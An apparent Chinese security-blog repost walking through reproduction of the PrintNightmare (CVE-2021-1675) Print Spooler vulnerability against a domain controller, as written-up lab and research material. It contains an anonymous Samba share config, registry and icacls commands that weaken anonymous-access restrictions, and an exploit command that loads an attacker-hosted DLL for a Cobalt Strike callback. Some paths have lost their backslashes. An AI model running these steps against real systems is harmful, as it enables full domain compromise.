点击上方蓝字关注我们
0x01 简介
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
环境准备
-
一个普通权限的域账户
-
目标开启Spooler服务
-
创建的smb服务允许匿名访问,即目标可以直接获取到文件
DC WindowsServer 2016 Standard
windows smba服务器:win10
linux smba服务器:kali
0x02 linux下攻击手法
在linux环境下,使用smbd服务可以很方便的开启匿名的samba服务器。
首先使用yum或者apt安装samba,安装完成之后修改/etc/samba/smb.conf文件为以下配置。
[global]workgroup = WORKGROUPserver string = Samba Servernetbios name = MYSERVERlog file = /var/log/samba/log.%mmax log size = 50security = usermap to guest = Bad User[smb]comment = Template Directoriesbrowseable = yeswriteable = yespath = /tmp/guest ok = yes
其中[smb]为访问该服务器共享文件夹的名称,path为samba服务器共享的目录。
修改完成之后使用命令service smbd start开启smba服务器。
使用脚本CVE-2021-1675.py执行以下命令
当出现Exploit Completed关键字的时候即为攻击成功。
可以看到已经成功上线cs
0x03 windows下攻击手法
这里使用的是三好学生的脚本
https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer
还有cube0x0放出的脚本
mkdir C:shareicacls C:share /T /grant Anonymous` logon:ricacls C:share /T /grant Everyone:rNew-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existingNullSessionPipes REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /vNullSessionShares /t REG_MULTI_SZ /d share /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /tREG_DWORD /d 0 /f
入口机器执行该脚本
使用脚本CVE-2021-1675.py执行以下命令
python3 CVE-2021-1675.py hack.com/user1:User@hack.com@192.168.28.197 '\192.168.28.187smbartifact.dll'
可以看到已经上线成功了
原文始发于微信公众号(灼剑安全团队):漏洞复现|PrintNightmare(CVE-2021-1675)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论